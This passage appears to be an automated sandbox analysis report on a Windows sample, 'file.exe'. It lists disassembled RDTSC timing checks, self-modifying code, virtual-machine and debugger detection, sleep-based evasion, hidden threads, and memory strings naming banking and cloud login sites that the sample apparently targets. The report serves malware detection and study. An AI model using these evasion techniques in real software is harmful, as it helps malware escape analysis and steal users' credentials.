Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30C31 second address: 4A30CA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEA44C7ED4Fh 0x00000009 or ch, FFFFFFCEh 0x0000000c jmp 00007FEA44C7ED59h 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop ebx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 call 00007FEA44C7ED49h 0x0000001c jmp 00007FEA44C7ED4Ah 0x00000021 push eax 0x00000022 pushad 0x00000023 mov cl, bl 0x00000025 mov ecx, 56280919h 0x0000002a popad 0x0000002b mov eax, dword ptr [esp+04h] 0x0000002f jmp 00007FEA44C7ED4Fh 0x00000034 mov eax, dword ptr [eax] 0x00000036 pushad 0x00000037 push edi 0x00000038 pop edi 0x00000039 mov esi, 4835D8FDh 0x0000003e popad 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 pushad 0x00000044 push edi 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30CA9 second address: 4A30D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FEA44C4CABBh 0x0000000b xor ah, FFFFFFEEh 0x0000000e jmp 00007FEA44C4CAC9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop eax 0x00000016 jmp 00007FEA44C4CABEh 0x0000001b call 00007FEAB6B71941h 0x00000020 push 76952B70h 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov eax, dword ptr [esp+10h] 0x00000030 mov dword ptr [esp+10h], ebp 0x00000034 lea ebp, dword ptr [esp+10h] 0x00000038 sub esp, eax 0x0000003a push ebx 0x0000003b push esi 0x0000003c push edi 0x0000003d mov eax, dword ptr [769B4538h] 0x00000042 xor dword ptr [ebp-04h], eax 0x00000045 xor eax, ebp 0x00000047 push eax 0x00000048 mov dword ptr [ebp-18h], esp 0x0000004b push dword ptr [ebp-08h] 0x0000004e mov eax, dword ptr [ebp-04h] 0x00000051 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000058 mov dword ptr [ebp-08h], eax 0x0000005b lea eax, dword ptr [ebp-10h] 0x0000005e mov dword ptr fs:[00000000h], eax 0x00000064 ret 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007FEA44C4CAC7h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30D05 second address: 4A30D0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30D0B second address: 4A30D0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30D9C second address: 4A30DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30DA0 second address: 4A30DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30DA4 second address: 4A30DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40A49 second address: 4A40A8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FEA44C4CAC6h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov eax, ebx 0x00000013 mov ax, dx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b call 00007FEA44C4CAC0h 0x00000020 pop ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40A8E second address: 4A40A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40A93 second address: 4A40ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 push esi 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d jmp 00007FEA44C4CAC0h 0x00000012 mov esi, 7E249D71h 0x00000017 popad 0x00000018 xchg eax, esi 0x00000019 pushad 0x0000001a mov ah, 89h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40ABD second address: 4A40B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FEA44C7ED4Bh 0x0000000a xor cl, FFFFFFDEh 0x0000000d jmp 00007FEA44C7ED59h 0x00000012 popfd 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FEA44C7ED4Dh 0x0000001e sbb eax, 52CD9A16h 0x00000024 jmp 00007FEA44C7ED51h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007FEA44C7ED50h 0x00000030 sbb ecx, 25BA4E38h 0x00000036 jmp 00007FEA44C7ED4Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov ax, BC6Fh 0x00000041 popad 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007FEA44C7ED57h 0x0000004c xor ecx, 63CA20AEh 0x00000052 jmp 00007FEA44C7ED59h 0x00000057 popfd 0x00000058 movzx esi, dx 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40B7E second address: 4A40BD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FEA44C4CAC8h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007FEA44C4CABBh 0x0000000f sbb ecx, 18672B6Eh 0x00000015 jmp 00007FEA44C4CAC9h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov esi, dword ptr [ebp+0Ch] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40BD2 second address: 4A40BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40BD6 second address: 4A40BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40BDA second address: 4A40BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40BE0 second address: 4A40C3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 jmp 00007FEA44C4CABCh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f jmp 00007FEA44C4CAC0h 0x00000014 je 00007FEAB6B5A267h 0x0000001a jmp 00007FEA44C4CAC0h 0x0000001f cmp dword ptr [769B459Ch], 05h 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FEA44C4CAC7h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40C3C second address: 4A40C8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FEAB6BA4584h 0x0000000f jmp 00007FEA44C7ED4Eh 0x00000014 xchg eax, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movsx ebx, cx 0x0000001b call 00007FEA44C7ED56h 0x00000020 pop ecx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40C8C second address: 4A40CA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA44C4CAC7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40CA7 second address: 4A40CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40CAB second address: 4A40D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FEA44C4CAC2h 0x00000010 or ax, DD28h 0x00000015 jmp 00007FEA44C4CABBh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007FEA44C4CAC8h 0x00000021 jmp 00007FEA44C4CAC5h 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, esi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FEA44C4CAC3h 0x00000032 sbb si, 1C7Eh 0x00000037 jmp 00007FEA44C4CAC9h 0x0000003c popfd 0x0000003d jmp 00007FEA44C4CAC0h 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40D71 second address: 4A40E04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA44C7ED4Fh 0x00000008 pushfd 0x00000009 jmp 00007FEA44C7ED58h 0x0000000e xor ch, 00000038h 0x00000011 jmp 00007FEA44C7ED4Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c mov eax, 5D812E8Bh 0x00000021 pushfd 0x00000022 jmp 00007FEA44C7ED50h 0x00000027 xor eax, 1BA66E98h 0x0000002d jmp 00007FEA44C7ED4Bh 0x00000032 popfd 0x00000033 popad 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov eax, 28F31E61h 0x0000003d pushfd 0x0000003e jmp 00007FEA44C7ED4Eh 0x00000043 sbb ecx, 3AFD18F8h 0x00000049 jmp 00007FEA44C7ED4Bh 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40EB5 second address: 4A40EFB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEA44C4CAC9h 0x00000008 sbb si, D5C6h 0x0000000d jmp 00007FEA44C4CAC1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FEA44C4CABDh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40EFB second address: 4A40F01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40F01 second address: 4A40F05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40F05 second address: 4A40F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FEA44C7ED55h 0x00000010 sub eax, 01D6B886h 0x00000016 jmp 00007FEA44C7ED51h 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FEA44C7ED4Eh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D45F5C second address: 5D45F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEA44C4CAC1h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D460BF second address: 5D460C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D493DC second address: 5D493E6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D493E6 second address: 5D4940C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jo 00007FEA44C7ED54h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D4940C second address: 5D49410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D49410 second address: 5D49437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jno 00007FEA44C7ED4Eh 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 jne 00007FEA44C7ED48h 0x00000019 push eax 0x0000001a push edx 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D494C9 second address: 5D4955B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push esi 0x00000007 jnp 00007FEA44C4CABCh 0x0000000d pop esi 0x0000000e nop 0x0000000f movzx edi, di 0x00000012 push 00000000h 0x00000014 jnp 00007FEA44C4CABAh 0x0000001a call 00007FEA44C4CAB9h 0x0000001f push edx 0x00000020 jl 00007FEA44C4CAB8h 0x00000026 pushad 0x00000027 popad 0x00000028 pop edx 0x00000029 push eax 0x0000002a pushad 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 push ecx 0x00000032 pushad 0x00000033 popad 0x00000034 pop ecx 0x00000035 popad 0x00000036 mov eax, dword ptr [esp+04h] 0x0000003a push eax 0x0000003b jno 00007FEA44C4CAB8h 0x00000041 pop eax 0x00000042 mov eax, dword ptr [eax] 0x00000044 pushad 0x00000045 jmp 00007FEA44C4CAC3h 0x0000004a jns 00007FEA44C4CACCh 0x00000050 popad 0x00000051 mov dword ptr [esp+04h], eax 0x00000055 push eax 0x00000056 jp 00007FEA44C4CABCh 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D497B2 second address: 5D497BC instructions: 0x00000000 rdtsc 0x00000002 js 00007FEA44C7ED4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D498E0 second address: 5D498EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D498EF second address: 5D4996A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA44C7ED4Dh 0x00000009 popad 0x0000000a pop edi 0x0000000b pop eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007FEA44C7ED48h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 pushad 0x00000027 sbb edx, 436C0E60h 0x0000002d or ah, FFFFFFA0h 0x00000030 popad 0x00000031 push 00000003h 0x00000033 cmc 0x00000034 push 00000000h 0x00000036 movsx edi, cx 0x00000039 push 00000003h 0x0000003b jnp 00007FEA44C7ED48h 0x00000041 mov ch, ah 0x00000043 add dword ptr [ebp+122D1EF5h], edi 0x00000049 call 00007FEA44C7ED49h 0x0000004e jmp 00007FEA44C7ED4Eh 0x00000053 push eax 0x00000054 jl 00007FEA44C7ED54h 0x0000005a push eax 0x0000005b push edx 0x0000005c jng 00007FEA44C7ED46h 0x00000062 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D0AC40 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D0AB58 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D08196 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: EB8C32 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5BCDC0C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5D6BEA5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5D783C2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5E04435 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5BD0E4E instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BCE0FF rdtsc 0_2_05BCE0FF
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 4144 Thread sleep time: -34017s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2528 Thread sleep time: -210000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6972 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5204 Thread sleep time: -38019s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4776 Thread sleep time: -46023s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: file.exe, file.exe, 00000000.00000002.2513695692.0000000005D4D000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2507713715.0000000000E92000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: file.exe, 00000000.00000002.2512775608.0000000005370000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}o
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2416710241.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2506779993.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2506779993.00000000007D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2512775608.0000000005370000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, 00000000.00000003.2187512934.00000000053C4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: file.exe, 00000000.00000003.2416710241.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2506779993.00000000007D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWc
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000002.2513695692.0000000005D4D000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2507713715.0000000000E92000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: file.exe, 00000000.00000003.2187512934.00000000053BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BCE0FF rdtsc 0_2_05BCE0FF
Creates a process in suspended mode (likely to inject code)
